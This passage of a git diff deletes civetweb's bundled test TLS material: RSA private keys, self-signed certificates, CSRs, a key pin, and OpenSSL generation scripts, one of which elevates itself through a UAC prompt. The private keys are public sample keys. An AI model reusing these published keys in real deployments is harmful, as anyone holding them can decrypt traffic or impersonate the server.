-1Xoec+dIQsSTq3fxowNQYoMGuuPCxUrr5Ls7KuSKhd4H11aV0duoPujcyQgzexTF
-S1pHrHRExn6whfhekTTFQtyKnVsbR60/hnZ+sQ/Yg45VqVBybhIKcphknJOv+hHf
-U2aUg9T/juzvhTqurDBQT3ZvO9/WMZ5QcSfsgCBIk0hQE2w4h1FAAwG5MkgCYbap
-rBdp62MuL80HA1J3Q5fa/ej1KsD5mFBik8bnGncHedweBW+aGanuFR2VhuJ6ZxQe
-fXyFmPE9Vktu1jyBCV2tbIxmRVptJmO4gfcgpwIDAQABAoIBAEpiBlZzTYi4Q1V/
-gO/9vzYZt6akxw7jJZzUL2Y6g6U0KLq+deZoLMF3sB4lZJIgATe1NHYmMCz2Coq1
-/N/Ib+rF8Bu7ivWN1TdWWmft8Bs3UvYfSXVjXG3FQjWaIjzuTCe6nxcwgOkXBBqn
-S5g1fAKJj8TATBCyfAa4uyFwWe+eGRs0W9pOMP8eU0EtvTer34rSU4L/LG3d7UcI
-upm/0T5QeLqv6Htv8UbHNQto701vJQVdWLavALMXGfGO112yTSz7OpitKpBEYDrV
-3+781zYm8AKkFIsRMXVK2HiBEF43zIrnNuoozsKpps/tZdlv9VqCSJ4hIaHm9mxJ
-3zMN3OECgYEA8dr5w68jTLrthDZ2qOG/6tZw9fMfXoF7hSUXplgxMN5Sohfr23Xm
-/IHVm7oiqhDNNZzplGyux7jB00x2/1ltOzay5mx4PMMLlsDBgiURgUwqS8C8dPVh
-0sN2RytdKGDmFP6lnKS7c15CEw1ChvdL4RwtqzjTKE0ZOK3zUY5/MykCgYEA6Wru
-Dusip4p4PA1K6eiCoC6SaqCuQCB7ZR5WPR5szAFkgoW63rNtC8S4Bl1qXXUb/v/V
-ptaVsGrqBc8/CxvCac1KCREbcyjuVWUAfw2VwdwgDbfrEieWrZNvsDs86EgB+Bo4
-Jm/cUjrFqSTJAbtvp4SYl1reax86XmCsHhNNf08CgYEApAhxd9/0IBlz+ET8K8SY
-5sy0ZouTjgRh40bqCF8uVcej4d45kGoh1Ma2Ot1+nzuwApm+7nTcAgd0JjxpRPzB
-EfUiVxfgYM2ksYVgeUVs3vXqheBdsTGwPENnmBN4Jme6BSlE573uiOu4ArXulh1p
-sG7tJoDu7hmEbqXELl9oNCkCgYEA51zWGnN3JhpakyuZ1cBhueRvvMEH9wg7Rz+K
-u4oszQmUVsu3Locqzz9uKODvTTOHTHrJi1WnifZvgNKr6pbZXYXenJ4YV01676nt
-lAIjLsTCANcMajJTaDl7u3L8LEEzsnhKr86w09Dtm3qawtzHD4Seu2eWjxelA2dP
-M4BukIECgYAn5n+HhCi5JD3I1VCX70uE5nj8alYyQ85qE57Lopmau1RyVfP4oeCt
-gMsy0o7vIF+xW1Z2yDxm+mJghOY/myDsbTGX9G8rY7PC7tWE8okjsQT5UoayFzKp
-mmvrTV8TQBVcTQqn0Jyj7T5MBnuwfioXYN9pKPQlvc4pPmHbqPi7CA==
------END RSA PRIVATE KEY-----
diff --git a/thirdparty/civetweb-1.10/resources/cert/client.pem b/thirdparty/civetweb-1.10/resources/cert/client.pem
deleted file mode 100644
index 6974c4c..0000000
--- a/thirdparty/civetweb-1.10/resources/cert/client.pem
+++ /dev/null
@@ -1,46 +0,0 @@
------BEGIN CERTIFICATE-----
-MIIDBjCCAe4CCQCFpskbTEyGpTANBgkqhkiG9w0BAQsFADBFMQswCQYDVQQGEwJB
-VTETMBEGA1UECAwKU29tZS1TdGF0ZTEhMB8GA1UECgwYSW50ZXJuZXQgV2lkZ2l0
-cyBQdHkgTHRkMB4XDTE3MDkwMzE5MjIwNVoXDTI3MDkwMTE5MjIwNVowRTELMAkG
-A1UEBhMCQVUxEzARBgNVBAgMClNvbWUtU3RhdGUxITAfBgNVBAoMGEludGVybmV0
-IFdpZGdpdHMgUHR5IEx0ZDCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEB
-ANyFUuYxv/uexSr/K9aSmcnEcylNH4S3NdlvMwFvW3XFqAV05tV6HnPnSELEk6t3
-8aMDUGKDBrrjwsVK6+S7OyrkioXeB9dWldHbqD7o3MkIM3sUxUtaR6x0RMZ+sIX4
-XpE0xULcip1bG0etP4Z2frEP2IOOValQcm4SCnKYZJyTr/oR31NmlIPU/47s74U6
-rqwwUE92bzvf1jGeUHEn7IAgSJNIUBNsOIdRQAMBuTJIAmG2qawXaetjLi/NBwNS
-d0OX2v3o9SrA+ZhQYpPG5xp3B3ncHgVvmhmp7hUdlYbiemcUHn18hZjxPVZLbtY8
-gQldrWyMZkVabSZjuIH3IKcCAwEAATANBgkqhkiG9w0BAQsFAAOCAQEAUZsxxYVK
-l0tH8E0FCnRJTvG6gjOeiqJRIk7Mmg+hfFZK/ewqBixxg1OBM/xmPXfnI/ULRz74
-UMXnyDIsGakzrFDqWqPt3xots35yHHo2ZkVao6gV4qx0Reu86qeN5iRvG0EjoGMD
-7XRaw56E0XhvMBJW1CiUg944HSw4ptJli0dJCYa+P9s1Fop3lA0d9+dwKMKUyCDr
-yBz4XjyO9jXSQC/t0fkxC4gHhdH/ZaAq0Lem6Xxc40ZwoVc1+dHWFxn8d6L/RYvb
-16gOuw6s2Xt9h2K8OFKzehOgNZAkI2oUELRFUx9Wc8/Bcl6uEkBmPHRqeX5l35jo
-ztBrpAEsCy0cGg==
------END CERTIFICATE-----
------BEGIN RSA PRIVATE KEY-----
-MIIEpAIBAAKCAQEA3IVS5jG/+57FKv8r1pKZycRzKU0fhLc12W8zAW9bdcWoBXTm
-1Xoec+dIQsSTq3fxowNQYoMGuuPCxUrr5Ls7KuSKhd4H11aV0duoPujcyQgzexTF
-S1pHrHRExn6whfhekTTFQtyKnVsbR60/hnZ+sQ/Yg45VqVBybhIKcphknJOv+hHf
-U2aUg9T/juzvhTqurDBQT3ZvO9/WMZ5QcSfsgCBIk0hQE2w4h1FAAwG5MkgCYbap
-rBdp62MuL80HA1J3Q5fa/ej1KsD5mFBik8bnGncHedweBW+aGanuFR2VhuJ6ZxQe
-fXyFmPE9Vktu1jyBCV2tbIxmRVptJmO4gfcgpwIDAQABAoIBAEpiBlZzTYi4Q1V/
-gO/9vzYZt6akxw7jJZzUL2Y6g6U0KLq+deZoLMF3sB4lZJIgATe1NHYmMCz2Coq1
-/N/Ib+rF8Bu7ivWN1TdWWmft8Bs3UvYfSXVjXG3FQjWaIjzuTCe6nxcwgOkXBBqn
-S5g1fAKJj8TATBCyfAa4uyFwWe+eGRs0W9pOMP8eU0EtvTer34rSU4L/LG3d7UcI
-upm/0T5QeLqv6Htv8UbHNQto701vJQVdWLavALMXGfGO112yTSz7OpitKpBEYDrV
-3+781zYm8AKkFIsRMXVK2HiBEF43zIrnNuoozsKpps/tZdlv9VqCSJ4hIaHm9mxJ
-3zMN3OECgYEA8dr5w68jTLrthDZ2qOG/6tZw9fMfXoF7hSUXplgxMN5Sohfr23Xm
-/IHVm7oiqhDNNZzplGyux7jB00x2/1ltOzay5mx4PMMLlsDBgiURgUwqS8C8dPVh
-0sN2RytdKGDmFP6lnKS7c15CEw1ChvdL4RwtqzjTKE0ZOK3zUY5/MykCgYEA6Wru
-Dusip4p4PA1K6eiCoC6SaqCuQCB7ZR5WPR5szAFkgoW63rNtC8S4Bl1qXXUb/v/V
-ptaVsGrqBc8/CxvCac1KCREbcyjuVWUAfw2VwdwgDbfrEieWrZNvsDs86EgB+Bo4
-Jm/cUjrFqSTJAbtvp4SYl1reax86XmCsHhNNf08CgYEApAhxd9/0IBlz+ET8K8SY
-5sy0ZouTjgRh40bqCF8uVcej4d45kGoh1Ma2Ot1+nzuwApm+7nTcAgd0JjxpRPzB
-EfUiVxfgYM2ksYVgeUVs3vXqheBdsTGwPENnmBN4Jme6BSlE573uiOu4ArXulh1p
-sG7tJoDu7hmEbqXELl9oNCkCgYEA51zWGnN3JhpakyuZ1cBhueRvvMEH9wg7Rz+K
-u4oszQmUVsu3Locqzz9uKODvTTOHTHrJi1WnifZvgNKr6pbZXYXenJ4YV01676nt
-lAIjLsTCANcMajJTaDl7u3L8LEEzsnhKr86w09Dtm3qawtzHD4Seu2eWjxelA2dP
-M4BukIECgYAn5n+HhCi5JD3I1VCX70uE5nj8alYyQ85qE57Lopmau1RyVfP4oeCt
-gMsy0o7vIF+xW1Z2yDxm+mJghOY/myDsbTGX9G8rY7PC7tWE8okjsQT5UoayFzKp
-mmvrTV8TQBVcTQqn0Jyj7T5MBnuwfioXYN9pKPQlvc4pPmHbqPi7CA==
------END RSA PRIVATE KEY-----
diff --git a/thirdparty/civetweb-1.10/resources/cert/make_certs.bat b/thirdparty/civetweb-1.10/resources/cert/make_certs.bat
deleted file mode 100644
index 66a091d..0000000
--- a/thirdparty/civetweb-1.10/resources/cert/make_certs.bat
+++ /dev/null
@@ -1,55 +0,0 @@
-@echo off

-REM We need admin rights, otherwise the random state cannot be written

-REM Thanks to http://stackoverflow.com/a/10052222/1531708

-

-:: BatchGotAdmin

-:-------------------------------------

-REM  --> Check for permissions

-    IF "%PROCESSOR_ARCHITECTURE%" EQU "amd64" (

->nul 2>&1 "%SYSTEMROOT%\SysWOW64\cacls.exe" "%SYSTEMROOT%\SysWOW64\config\system"

-) ELSE (

->nul 2>&1 "%SYSTEMROOT%\system32\cacls.exe" "%SYSTEMROOT%\system32\config\system"

-)

-

-REM --> If error flag set, we do not have admin.

-if '%errorlevel%' NEQ '0' (

-    echo Requesting administrative privileges...

-    goto UACPrompt

-) else ( goto gotAdmin )

-

-:UACPrompt

-    echo Set UAC = CreateObject^("Shell.Application"^) > "%temp%\getadmin.vbs"

-    set params = %*:"=""

-    echo UAC.ShellExecute "cmd.exe", "/c ""%~s0"" %params%", "", "runas", 1 >> "%temp%\getadmin.vbs"

-

-    "%temp%\getadmin.vbs"

-    del "%temp%\getadmin.vbs"

-    exit /B

-

-:gotAdmin

-    pushd "%CD%"

-    CD /D "%~dp0"

-:-------------------------------------- 

-

-del server.*

-

-c:\OpenSSL-Win32\bin\openssl.exe genrsa -des3 -out server.key 4096

-

-c:\OpenSSL-Win32\bin\openssl.exe req -sha256 -new -key server.key -out server.csr -utf8

-

-copy server.key server.key.orig

-

-c:\OpenSSL-Win32\bin\openssl.exe rsa -in server.key.orig -out server.key

-

-echo [ v3_ca ] > server.ext.txt

-echo [ req ] >> server.ext.txt

-echo req_extensions = my_extensions >> server.ext.txt

-echo [ my_extensions ] >> server.ext.txt

-echo extendedKeyUsage=serverAuth >> server.ext.txt

-echo crlDistributionPoints=URI:http://localhost/crl.pem >> server.ext.txt

-

-c:\OpenSSL-Win32\bin\openssl.exe x509 -req -days 365 -extensions v3_ca -extfile server.ext.txt -in server.csr -signkey server.key -out server.crt

-

-copy server.crt server.pem

-

-type server.key >> server.pem

diff --git a/thirdparty/civetweb-1.10/resources/cert/make_certs.sh b/thirdparty/civetweb-1.10/resources/cert/make_certs.sh
deleted file mode 100644
index b4b6714..0000000
--- a/thirdparty/civetweb-1.10/resources/cert/make_certs.sh
+++ /dev/null
@@ -1,64 +0,0 @@
-#!/bin/sh
-#using "pass" for every password
-
-echo "Generating client certificate ..."
-
-openssl genrsa -des3 -out client.key 2048
-openssl req -new -key client.key -out client.csr
-
-cp client.key client.key.orig
-
-openssl rsa -in client.key.orig -out client.key
-
-openssl x509 -req -days 3650 -in client.csr -signkey client.key -out client.crt
-
-cp client.crt client.pem
-cat client.key >> client.pem
-
-openssl pkcs12 -export -inkey client.key -in client.pem -name ClientName -out client.pfx
-
-
-echo "Generating first server certificate ..."
-
-openssl genrsa -des3 -out server.key 2048
-openssl req -new -key server.key -out server.csr
-
-cp server.key server.key.orig
-
-openssl rsa -in server.key.orig -out server.key
-
-openssl x509 -req -days 3650 -in server.csr -signkey server.key -out server.crt
-
-cp server.crt server.pem
-cat server.key >> server.pem
-
-openssl pkcs12 -export -inkey server.key -in server.pem -name ServerName -out server.pfx
-
-echo "First server certificate hash for Public-Key-Pins header:"
-
-openssl x509 -pubkey < server.crt | openssl pkey -pubin -outform der | openssl dgst -sha256 -binary | base64 > server.pin
-
-cat server.pin
-
-echo "Generating backup server certificate ..."
-
-openssl genrsa -des3 -out server_bkup.key 2048
-openssl req -new -key server_bkup.key -out server_bkup.csr
-
-cp server_bkup.key server_bkup.key.orig
-
-openssl rsa -in server_bkup.key.orig -out server_bkup.key
-
-openssl x509 -req -days 3650 -in server_bkup.csr -signkey server_bkup.key -out server_bkup.crt
-
-cp server_bkup.crt server_bkup.pem
-cat server_bkup.key >> server_bkup.pem
-
-openssl pkcs12 -export -inkey server_bkup.key -in server_bkup.pem -name ServerName -out server_bkup.pfx
-
-echo "Backup server certificate hash for Public-Key-Pins header:"
-
-openssl x509 -pubkey < server_bkup.crt | openssl pkey -pubin -outform der | openssl dgst -sha256 -binary | base64 > server_bkup.pin
-
-cat server_bkup.pin
-
diff --git a/thirdparty/civetweb-1.10/resources/cert/server.crt b/thirdparty/civetweb-1.10/resources/cert/server.crt
deleted file mode 100644
index a13fa01..0000000
--- a/thirdparty/civetweb-1.10/resources/cert/server.crt
+++ /dev/null
@@ -1,19 +0,0 @@
------BEGIN CERTIFICATE-----
-MIIDBjCCAe4CCQDDIH/hK1C0BjANBgkqhkiG9w0BAQsFADBFMQswCQYDVQQGEwJB
-VTETMBEGA1UECAwKU29tZS1TdGF0ZTEhMB8GA1UECgwYSW50ZXJuZXQgV2lkZ2l0
-cyBQdHkgTHRkMB4XDTE3MDkwMzE5MjIyOVoXDTI3MDkwMTE5MjIyOVowRTELMAkG
-A1UEBhMCQVUxEzARBgNVBAgMClNvbWUtU3RhdGUxITAfBgNVBAoMGEludGVybmV0
-IFdpZGdpdHMgUHR5IEx0ZDCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEB
-ALUmHEoJcebkUOyqEAhH2OdEuTTk8AxjjVvq9B1dXjlf/dvxGnZX2InScGCJA9Uy
-kO1XI8nLXKAGl6OL9jDt/0K3/oFLedDLtZf1qE+kEBuaqAgL+VVAPqwtQZcyCoI9
-zx777I1tPUOl1Q1ass3T7lYsTN8QADmW5zjJn4MJPMQ55qoQUL7HVQR4VJ/ELAXu
-xGkQlJFBY5q0Qq6buN102D2upNKXKpDYYPc0OgyJ73fR2+rzQapc52QD4Oh6cbD8
-Fh5Vh/qGNMckh1cQsVm6fRtlkoUqxANZk58rqkEwOuk04p7vlnVvZTidOng7G2nW
-1n7YQXCycI+JhofCqOqT9x8CAwEAATANBgkqhkiG9w0BAQsFAAOCAQEATx5GZCxU
-KKQCDsafzAwoodbjRlpsJhvdCBGpgMrFTPyQo7BNF/E2XyVCDXbCmbxTRlhFafJG
-Loj/73toGkU8+1qUIy/Fffsmeh9YCyMlA2bE+85ccMCVKgCIEx0+fa6Au6/Ref7/
-n7vN/9deJzxWUaNbP26LNq3prbuIbKN6WFNT5mR8HLTmP3O45sqy1jwOZgSwvbgH
-bhugE4tSsKghMV5rUgiMhGIrEakFH+1LCZjQh+ojcWWEWyVk3QTQMmSd6tAZf4pb
-/Y1GuN6DAiLfzbabUQZCeQ1iZcgrwIOGHWJUPAf+BTPcFLlR3k/kYA9lrqvra7ln
-dFIuUv3YzfenfA==
------END CERTIFICATE-----
diff --git a/thirdparty/civetweb-1.10/resources/cert/server.csr b/thirdparty/civetweb-1.10/resources/cert/server.csr
deleted file mode 100644
index fe5f3fc..0000000
--- a/thirdparty/civetweb-1.10/resources/cert/server.csr
+++ /dev/null
@@ -1,16 +0,0 @@
------BEGIN CERTIFICATE REQUEST-----
-MIICijCCAXICAQAwRTELMAkGA1UEBhMCQVUxEzARBgNVBAgMClNvbWUtU3RhdGUx
-ITAfBgNVBAoMGEludGVybmV0IFdpZGdpdHMgUHR5IEx0ZDCCASIwDQYJKoZIhvcN
-AQEBBQADggEPADCCAQoCggEBALUmHEoJcebkUOyqEAhH2OdEuTTk8AxjjVvq9B1d
-Xjlf/dvxGnZX2InScGCJA9UykO1XI8nLXKAGl6OL9jDt/0K3/oFLedDLtZf1qE+k
-EBuaqAgL+VVAPqwtQZcyCoI9zx777I1tPUOl1Q1ass3T7lYsTN8QADmW5zjJn4MJ
-PMQ55qoQUL7HVQR4VJ/ELAXuxGkQlJFBY5q0Qq6buN102D2upNKXKpDYYPc0OgyJ
-73fR2+rzQapc52QD4Oh6cbD8Fh5Vh/qGNMckh1cQsVm6fRtlkoUqxANZk58rqkEw
-Ouk04p7vlnVvZTidOng7G2nW1n7YQXCycI+JhofCqOqT9x8CAwEAAaAAMA0GCSqG
-SIb3DQEBCwUAA4IBAQCbJgy8LBoI+XCliwPGVM+ZuxEVuR15iaUSX7epuKb4jvyC
-y2+YQnNyxLkK8Bu2z9uxXUBbmhqXNiXZd7/SnbTR9MGMq3vyYg6Ggypo24DWez04
-tFaUiLJZsKVoVM6DP3zwpaKKSSJILU2GbNQKW87PHIPSdmAEh+gFD2Uy5sFrvuFJ
-LtHfIMMAhMSoEMjmjaLI7N4GVgFhGEr5q5HGpLuAU8cKGyKPkIkSyYN5Ott4u22d
-rpASF3TXfCJJ0YiM84U86rhZ0BrMqrVtw8r3uj+4G7hrE92eBU+DDn1D8jWzbyVc
-6dlTZaknMeJqsQe2/vq+T5P2yl+/39TnlvDO+cS2
------END CERTIFICATE REQUEST-----
diff --git a/thirdparty/civetweb-1.10/resources/cert/server.key b/thirdparty/civetweb-1.10/resources/cert/server.key
deleted file mode 100644
index bd010ef..0000000
--- a/thirdparty/civetweb-1.10/resources/cert/server.key
+++ /dev/null
@@ -1,27 +0,0 @@
------BEGIN RSA PRIVATE KEY-----
-MIIEpAIBAAKCAQEAtSYcSglx5uRQ7KoQCEfY50S5NOTwDGONW+r0HV1eOV/92/Ea
-dlfYidJwYIkD1TKQ7VcjyctcoAaXo4v2MO3/Qrf+gUt50Mu1l/WoT6QQG5qoCAv5
-VUA+rC1BlzIKgj3PHvvsjW09Q6XVDVqyzdPuVixM3xAAOZbnOMmfgwk8xDnmqhBQ
-vsdVBHhUn8QsBe7EaRCUkUFjmrRCrpu43XTYPa6k0pcqkNhg9zQ6DInvd9Hb6vNB
-qlznZAPg6HpxsPwWHlWH+oY0xySHVxCxWbp9G2WShSrEA1mTnyuqQTA66TTinu+W
-dW9lOJ06eDsbadbWfthBcLJwj4mGh8Ko6pP3HwIDAQABAoIBAGgaacGGogW+Cl+n
-8CTCHX3y+bjTJL0J7S/426eQg9jXOI3QhpOiMlgqLtjbhO9d6vnqzS9oBmgUwcqE
-YcyGyd5u3P0zAeOjXk3hKIP0Vil2/L/7GaQLkrjiHUKlyHJG0SQORUiVkdKxl7nf
-+Mfe1qaBOQAsMuTluyXggSIOCfT+FdHoi6nr/+Nugyx7e/UrZ3GWHVbh8KXOlvHh
-kETfcI6KUkWKtE+YJx9w89Bjh8TBvU0nkOntR11T2SMNllyIS9nND8pqa7QPz3N0
-Ag/iN4Wh8S5f4Nn4GccAOtIORuYuw9Pmt1E9dFWEna1fGztBHlClFQPOLUhZ+/zR
-MfQV5bkCgYEA3pQTLZ5ldX1Kvg5sYw63wwewr147R0pav6AoJ8HTnWGqi5y485CX
-uKE/IcJseidG9FmkO7rfexQaBtW9eW0GCVru416VSP9g2r1iUu0ViaqctYt7ZacE
-UEI+g4FmaXHyn1CKTjJXgUAdoDbtlyHwLmLmNt+B3zKGa1lPIb5MwdMCgYEA0Fl7
-VCTnmdyFH8m/bK76uW7SgkYmKYd5AvDr2QFCSqY3tdZh2VIukoUPmheCFq0kpDc0
-+eT680rF/m6CCu+00nM6v/3TNARRANeQ2G73kTPpyiphE+ttKCBQ/tke3TcHQA85
-7cI6bfkMonyKi0JRdLs4QEWf86Avr6p6JKdQWgUCgYEA3oAT8+SF9D89umRcwWFz
-HcnQPF7sz0VrFmiZ+7RtQMTjYhFXalQ+91hp7euX2TzuV1JNNVCIG1dq9S4x7PKp
-uCxo5m4kugZg4gm0AsXyY95kLa+zuViOnVS7fWab5Aj+y3gN6kG07AYWF5URSaWp
-nhVLocso3uB5M1LiIg9EV/UCgYBNrN6Wyz9xFE6pQDzWlxGwakme+eomV3RdDVbQ
-S3DchcWFTEykicgFJghgCV2deKWNd2uPsreAVqMkLSzcSOuf/gesJkREQ0uzxaoh
-lpVDlBgYH96bX40NhabMrEOec3KHhmWxZ1UDRPNZ7JZ2Pp5Bp77b71knqdO9aRAq
-dBo3xQKBgQCnxheQbozuzPO/6nixAng1GP1GuuB2bVb4e5Z0+0dt2RfI8+MSqnSL
-q9Yr2+p/fJFkVthrOUYwJkMf7ujhK2uNCJ7aKmwHPSIRztNV3UDGFd9wgpj3Pebx
-36ahCvDzidTEG+EEra6zPJ1An3KEbPsfXwcy1NVEZ/kFQyzczL0AOw==
------END RSA PRIVATE KEY-----
diff --git a/thirdparty/civetweb-1.10/resources/cert/server.pem b/thirdparty/civetweb-1.10/resources/cert/server.pem
deleted file mode 100644
index 9a0027c..0000000
--- a/thirdparty/civetweb-1.10/resources/cert/server.pem
+++ /dev/null
@@ -1,46 +0,0 @@
------BEGIN CERTIFICATE-----
-MIIDBjCCAe4CCQDDIH/hK1C0BjANBgkqhkiG9w0BAQsFADBFMQswCQYDVQQGEwJB
-VTETMBEGA1UECAwKU29tZS1TdGF0ZTEhMB8GA1UECgwYSW50ZXJuZXQgV2lkZ2l0
-cyBQdHkgTHRkMB4XDTE3MDkwMzE5MjIyOVoXDTI3MDkwMTE5MjIyOVowRTELMAkG
-A1UEBhMCQVUxEzARBgNVBAgMClNvbWUtU3RhdGUxITAfBgNVBAoMGEludGVybmV0
-IFdpZGdpdHMgUHR5IEx0ZDCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEB
-ALUmHEoJcebkUOyqEAhH2OdEuTTk8AxjjVvq9B1dXjlf/dvxGnZX2InScGCJA9Uy
-kO1XI8nLXKAGl6OL9jDt/0K3/oFLedDLtZf1qE+kEBuaqAgL+VVAPqwtQZcyCoI9
-zx777I1tPUOl1Q1ass3T7lYsTN8QADmW5zjJn4MJPMQ55qoQUL7HVQR4VJ/ELAXu
-xGkQlJFBY5q0Qq6buN102D2upNKXKpDYYPc0OgyJ73fR2+rzQapc52QD4Oh6cbD8
-Fh5Vh/qGNMckh1cQsVm6fRtlkoUqxANZk58rqkEwOuk04p7vlnVvZTidOng7G2nW
-1n7YQXCycI+JhofCqOqT9x8CAwEAATANBgkqhkiG9w0BAQsFAAOCAQEATx5GZCxU
-KKQCDsafzAwoodbjRlpsJhvdCBGpgMrFTPyQo7BNF/E2XyVCDXbCmbxTRlhFafJG
-Loj/73toGkU8+1qUIy/Fffsmeh9YCyMlA2bE+85ccMCVKgCIEx0+fa6Au6/Ref7/
-n7vN/9deJzxWUaNbP26LNq3prbuIbKN6WFNT5mR8HLTmP3O45sqy1jwOZgSwvbgH
-bhugE4tSsKghMV5rUgiMhGIrEakFH+1LCZjQh+ojcWWEWyVk3QTQMmSd6tAZf4pb
-/Y1GuN6DAiLfzbabUQZCeQ1iZcgrwIOGHWJUPAf+BTPcFLlR3k/kYA9lrqvra7ln
-dFIuUv3YzfenfA==
------END CERTIFICATE-----
------BEGIN RSA PRIVATE KEY-----
-MIIEpAIBAAKCAQEAtSYcSglx5uRQ7KoQCEfY50S5NOTwDGONW+r0HV1eOV/92/Ea
-dlfYidJwYIkD1TKQ7VcjyctcoAaXo4v2MO3/Qrf+gUt50Mu1l/WoT6QQG5qoCAv5
-VUA+rC1BlzIKgj3PHvvsjW09Q6XVDVqyzdPuVixM3xAAOZbnOMmfgwk8xDnmqhBQ
-vsdVBHhUn8QsBe7EaRCUkUFjmrRCrpu43XTYPa6k0pcqkNhg9zQ6DInvd9Hb6vNB
-qlznZAPg6HpxsPwWHlWH+oY0xySHVxCxWbp9G2WShSrEA1mTnyuqQTA66TTinu+W
-dW9lOJ06eDsbadbWfthBcLJwj4mGh8Ko6pP3HwIDAQABAoIBAGgaacGGogW+Cl+n
-8CTCHX3y+bjTJL0J7S/426eQg9jXOI3QhpOiMlgqLtjbhO9d6vnqzS9oBmgUwcqE
-YcyGyd5u3P0zAeOjXk3hKIP0Vil2/L/7GaQLkrjiHUKlyHJG0SQORUiVkdKxl7nf
-+Mfe1qaBOQAsMuTluyXggSIOCfT+FdHoi6nr/+Nugyx7e/UrZ3GWHVbh8KXOlvHh
-kETfcI6KUkWKtE+YJx9w89Bjh8TBvU0nkOntR11T2SMNllyIS9nND8pqa7QPz3N0
-Ag/iN4Wh8S5f4Nn4GccAOtIORuYuw9Pmt1E9dFWEna1fGztBHlClFQPOLUhZ+/zR
-MfQV5bkCgYEA3pQTLZ5ldX1Kvg5sYw63wwewr147R0pav6AoJ8HTnWGqi5y485CX
-uKE/IcJseidG9FmkO7rfexQaBtW9eW0GCVru416VSP9g2r1iUu0ViaqctYt7ZacE
-UEI+g4FmaXHyn1CKTjJXgUAdoDbtlyHwLmLmNt+B3zKGa1lPIb5MwdMCgYEA0Fl7
-VCTnmdyFH8m/bK76uW7SgkYmKYd5AvDr2QFCSqY3tdZh2VIukoUPmheCFq0kpDc0
-+eT680rF/m6CCu+00nM6v/3TNARRANeQ2G73kTPpyiphE+ttKCBQ/tke3TcHQA85
-7cI6bfkMonyKi0JRdLs4QEWf86Avr6p6JKdQWgUCgYEA3oAT8+SF9D89umRcwWFz
-HcnQPF7sz0VrFmiZ+7RtQMTjYhFXalQ+91hp7euX2TzuV1JNNVCIG1dq9S4x7PKp
-uCxo5m4kugZg4gm0AsXyY95kLa+zuViOnVS7fWab5Aj+y3gN6kG07AYWF5URSaWp
-nhVLocso3uB5M1LiIg9EV/UCgYBNrN6Wyz9xFE6pQDzWlxGwakme+eomV3RdDVbQ
-S3DchcWFTEykicgFJghgCV2deKWNd2uPsreAVqMkLSzcSOuf/gesJkREQ0uzxaoh
-lpVDlBgYH96bX40NhabMrEOec3KHhmWxZ1UDRPNZ7JZ2Pp5Bp77b71knqdO9aRAq
-dBo3xQKBgQCnxheQbozuzPO/6nixAng1GP1GuuB2bVb4e5Z0+0dt2RfI8+MSqnSL
-q9Yr2+p/fJFkVthrOUYwJkMf7ujhK2uNCJ7aKmwHPSIRztNV3UDGFd9wgpj3Pebx
-36ahCvDzidTEG+EEra6zPJ1An3KEbPsfXwcy1NVEZ/kFQyzczL0AOw==
------END RSA PRIVATE KEY-----
diff --git a/thirdparty/civetweb-1.10/resources/cert/server.pin b/thirdparty/civetweb-1.10/resources/cert/server.pin
deleted file mode 100644
index 015792a..0000000
--- a/thirdparty/civetweb-1.10/resources/cert/server.pin
+++ /dev/null
@@ -1 +0,0 @@
-uz1UTAPen+xb+UoQqkVlEx4H653LbMjfRJcZx5OrjbI=
diff --git a/thirdparty/civetweb-1.10/resources/cert/server_bkup.crt b/thirdparty/civetweb-1.10/resources/cert/server_bkup.crt
deleted file mode 100644
index afe0d5d..0000000
--- a/thirdparty/civetweb-1.10/resources/cert/server_bkup.crt
+++ /dev/null
@@ -1,19 +0,0 @@
------BEGIN CERTIFICATE-----
-MIIDBjCCAe4CCQCFKfFGF1i10TANBgkqhkiG9w0BAQsFADBFMQswCQYDVQQGEwJB
-VTETMBEGA1UECAwKU29tZS1TdGF0ZTEhMB8GA1UECgwYSW50ZXJuZXQgV2lkZ2l0
-cyBQdHkgTHRkMB4XDTE3MDkwMzE5MjI1MVoXDTI3MDkwMTE5MjI1MVowRTELMAkG
-A1UEBhMCQVUxEzARBgNVBAgMClNvbWUtU3RhdGUxITAfBgNVBAoMGEludGVybmV0
-IFdpZGdpdHMgUHR5IEx0ZDCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEB
-AKTJr3PzWOR1Hrjfk9bBA7TptI1hNYVn/Xvi2GSferhJaWg69b2Li4t5/JxElESR
-8fy0lBMzQ/yaFiQb51y7Q1c+Z6xWLxk322rfy3WhU3DYiFL2sJndrDvAhmso122Z
-xVADA0cQwo520MgFYpHNBF8BcFV2IRukzVX+/nVkki05XcwfbI2y6gqCRpOSXdE9
-gCDVan3tSRbtrwKu7IHy88mL6057o82Uezpl0KesoCwb4f5oqs2vThUmXKuxu8GO
-WpZNK4JFWnTgDOJrubZvKxzzL9E85DS9aXLk6dNKBJVKPCETnYw+2ArMgXzs+JuA
-C4AhV0e6unLX9DcavZ6j7JcCAwEAATANBgkqhkiG9w0BAQsFAAOCAQEAJJWqVuQs
-guFZG/LZPeeh1WtZr9S6R5BT4+b+PH2teVyGtClXV6KpwcLNEVWzY3qPtrFFPQI1
-uEg6cY8w1JOiCmj/IWKsiHd+IdsqsFVKL+Bmvthm3HSgA6p6ZiVCG4E67p8xwiJP
-p5EwtMM/7BdS/tHLUOe1OpNZ8XtHRVUNbzy/+JV0So7WLP9ksGb6COL/9MF0/qG4
-4XrrvpZ9FAgRC9/22QyYiQqoaegGEy4E+KHOBxRmipInsU2H8aQA2sZzQ49Zew9E
-QI2jSJTC7EeuZ0OcZawKkJY1ZtIGmOo/Q956keOLdG8cxyq6pXW3gmq1X5QBxy1M
-pZYi5eIENGE63g==
------END CERTIFICATE-----
diff --git a/thirdparty/civetweb-1.10/resources/cert/server_bkup.csr b/thirdparty/civetweb-1.10/resources/cert/server_bkup.csr
deleted file mode 100644
index c866b57..0000000
--- a/thirdparty/civetweb-1.10/resources/cert/server_bkup.csr
+++ /dev/null
@@ -1,16 +0,0 @@
------BEGIN CERTIFICATE REQUEST-----
-MIICijCCAXICAQAwRTELMAkGA1UEBhMCQVUxEzARBgNVBAgMClNvbWUtU3RhdGUx
-ITAfBgNVBAoMGEludGVybmV0IFdpZGdpdHMgUHR5IEx0ZDCCASIwDQYJKoZIhvcN
-AQEBBQADggEPADCCAQoCggEBAKTJr3PzWOR1Hrjfk9bBA7TptI1hNYVn/Xvi2GSf
